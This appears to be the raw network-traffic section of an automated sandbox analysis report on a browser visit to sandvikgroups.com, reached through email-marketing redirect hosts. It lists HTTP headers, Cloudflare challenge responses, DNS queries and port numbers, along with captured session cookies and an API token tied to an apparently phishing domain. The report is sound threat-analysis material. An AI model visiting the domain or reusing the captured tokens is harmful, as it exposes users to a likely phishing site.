vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/pics/1024_bg.jpg HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/lib/pics/favi.ico HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c; cf_clearance=oHaYq7IYfWosN2nPRP.pTTLKRJAyLtN5uUZoaoiYTr4-1736283985-1.2.1.1-piz0OktFvZeLf62uywSuP3J_vhzBVwT.YudtWxBnV4hYfeskOjoMglPFCbtHf7OhboKa1K3k0QFxI4uW9abcSGgsy1VpFVpnigknqhPgfHD3mjvFO7rnx6ma530ul_r8uq.rhDCTP00hMzrqf5otLX1rvn1.8h4yffmMbPGGOaBXWvHbL_478ccyhofeYvax3EYXHDRhau3nWkI2ORvM.OM3tqbBS5Lk9Lb9zq0j6ExTorRW7WQY04gC9mzYFBTqeoLGs8CA4_mixlNlggc9n.o9SgJNZyeRTByaBc8oIU5_JGfgzAJy1cMQ.cWA_MMHu7YDH82JTqYV1Ol_MfveeGekCDuIrfofE9n2fX3etJ8PmGkDhIrDR1aDNduwnji9hXgf4DqQd992NvHKFQ0AVjEZwrWFJwqSjO6TxE_KqhXE0TU76ponUdkS2FU7MAdk
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/lib/pics/favi.ico HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: juddshaw.acemlnc.com
    Source: global trafficDNS traffic detected: DNS query: juddshaw.activehosted.com
    Source: global trafficDNS traffic detected: DNS query: sandvikgroups.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: unknownHTTP traffic detected: POST /report/v4?s=Pcg0o7Kj%2BRkdhhdLWX7U%2FtWVUL0wE8V1fG%2B7rp0VJrVdm01Fx%2BDD3F%2BiEeMtvmJ7tS8NOzIvP7o699TKmJFcbU7fjLyDKyfbHddhSmuvPjvQ5MYJj7BnZZuHIAMRVv7NzbE%2FpA%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 392Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:05:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:05:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:05:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:05:59 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: +cUJFJRzmMLSWxl0Ak+0dzHDnB1zlYt3XYc=$mRM51vznbhnlR0hLReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1JP8%2Bwtg6nJpuB1bLl5zc3m7s6SOJcQUFVq0ulaBEILkIT9c3IuXD14LTorBDDStLY0z8z2CdsaWVfqfzlkMQ1Y5%2FLZB6MNE0ujU7t1mBs8n46biwufoKDWW64LlRNJ6a0rHLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe6e8bcaf507cae-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1799&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1168&delivery_rate=1597374&cwnd=195&unsent_bytes=0&cid=2f46b7c8dd464465&ts=163&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:06:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:06:03 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: io6PSR2fop/WqwpYqgX+nCIRhPAwUr00ns0=$a0FnPrEPqs2cS+6UServer: cloudflareCF-RAY: 8fe6e8d1189f32dc-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:06:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: W0JsfAtzUkT6tWFs1q53m3YEvQcG63tQIbY=$EbjPqAAeW9Ipj8QlServer: cloudflareCF-RAY: 8fe6e8e88aad78dc-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:06:16 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Vz+5K+CAGAOjHd8ygafNWQRbCvb6WPIr/7w=$XcVRKU0/lcfYdvNgcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fe6e922b86d41e6-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:06:17 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: XwJSnbiPcdEr95HoJH5kuBIvF0LwgNLtYc8=$0vlyvQ5H+KQLE4veReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TgyHyJ9fdZ3Aix73FNjgFlfdO3yqZHPN%2FQ21eahiIhF6qxVLctsxZjL9SCu%2BVaB77pcMuYBXxAildc1FAwsmbuL0ugprFU4EQc2rnIt%2FRK3WXBrLwsYp2QeSbsZvinGWMPEXQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe6e92a3f43c40c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=33984&min_rtt=1550&rtt_var=19863&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1168&delivery_rate=1883870&cwnd=221&unsent_bytes=0&cid=07dd3805c82bff11&ts=152&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:06:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:06:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:06:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:06:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Jan 2025 21:06:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
